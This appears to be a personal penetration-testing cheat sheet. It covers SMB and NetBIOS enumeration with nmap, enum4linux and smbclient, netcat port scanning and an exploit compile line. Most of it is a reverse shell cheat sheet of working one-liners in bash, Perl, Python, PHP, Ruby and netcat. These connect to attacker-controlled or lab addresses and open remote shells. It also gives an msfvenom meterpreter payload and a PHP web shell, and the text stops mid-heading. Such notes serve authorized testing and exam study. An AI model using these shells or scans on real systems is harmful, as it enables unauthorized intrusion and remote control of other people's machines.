* smb security mode
nmap -v -p 139, 445 --script=smb-security-mode 10.11.1.236
* some checks
nmap -vvv -sU -sS --script smb-enum-users,smb-enum-shares,smb-os-discovery,smb-protocols,smb-security-mode,smb-system-info,smb2-capabilities,smb2-security-mode,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061 –script-args=unsafe=1 -p U:1^C,T:139 10.11.1.5
SMB Enumeration
SMB OS Discovery
nmap $ip --script smb-os-discovery.nse
Nmap port scan
nmap -v -p 139,445 -oG smb.txt $ip-254
Netbios Information Scanning
nbtscan -r $ip/24
Nmap find exposed Netbios servers
nmap -sU --script nbstat.nse -p 137 $ip
Nmap all SMB scripts scan
nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip
Nmap all SMB scripts authenticated scan
nmap -sV -Pn -vv -p 445 --script-args smbuser=<username>,smbpass=<password> --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip
SMB Enumeration Tools
nmblookup -A $ip
smbclient //MOUNT/share -I $ip -N
rpcclient -U "" $ip
enum4linux $ip
enum4linux -a $ip
SMB Finger Printing
smbclient -L //$ip
Nmap Scan for Open SMB Shares
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.10.0/24
Nmap scans for vulnerable SMB Servers
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip
Nmap List all SMB scripts installed
ls -l /usr/share/nmap/scripts/smb*
Enumerate SMB Users
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14
OR
python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip
RID Cycling - Null Sessions
ridenum.py $ip 500 50000 dict.txt
Manual Null Session Testing
Windows: net use \\$ip\IPC$ "" /u:""
Linux: smbclient -L //$ip
Port Scan
==========
* TCP portscan using netcat
nc -nvv -w 1 -z 10.0.0.19 3388-3390
* UDP portscan using netcat
nc -u -nvv -w 1 -z 10.0.0.19 3388-3390
* Ping sweep
nmap -sn 10.11.1.1-254
Compile exploit
==============
gcc -Wl,--hash-style=both -o sock sockpage.c
Reverse Shell Cheat Sheet
========================
* Bash reverse shell
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
bash -i >& /dev/tcp/192.168.178.102/5555 0>&1
* Bash Reverse Shell
exec 5<>/dev/tcp/attackerip/4444
exec 5<>/dev/tcp/192.168.178.102/9999
cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done
* Perl reverse Shell
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
* Perl reverse shell
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
* Python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.192",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.178.102",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.178.102",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.101",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.192",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["c:\\windows\\system32\\cmd.exe",""]);'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.192",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["c:\\windows\\system32\\cmd.exe",""]);'
* PHP reverse shell
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.178.102",5555);exec("/bin/sh -i <&3 >&3 2>&3");'
* PHP meterpreter reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.122.13 LPORT=443 -f raw > code.php
* php-reverseshell
cp /oscp/reverse_shells/php/php-reverse-shell-1.0/php-reverse-shell.php rev.php
* PHP simple shell Linux
<?php $cmd=$_GET[‘cmd’]; echo `$cmd`; ?>
* Ruby Reverse shell
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
* Ruby Reverse Shell target windows
ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
* Netcat reverse Shell
nc -e /bin/sh 10.0.0.1 1234
* Netcat reverse Shell Bash
/bin/sh | nc attackerip 4444
/bin/sh -i | nc 192.168.178.102 9999
* Netcat reverse Shell without nc -e
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f
rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 10.11.0.192 5555 >f
rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 192.168.178.102 9999 >f
mkfifo f;cat f|/bin/sh -i 2>&1|nc 192.168.178.102 9999 >f
* Netcat Reverse Shell without bash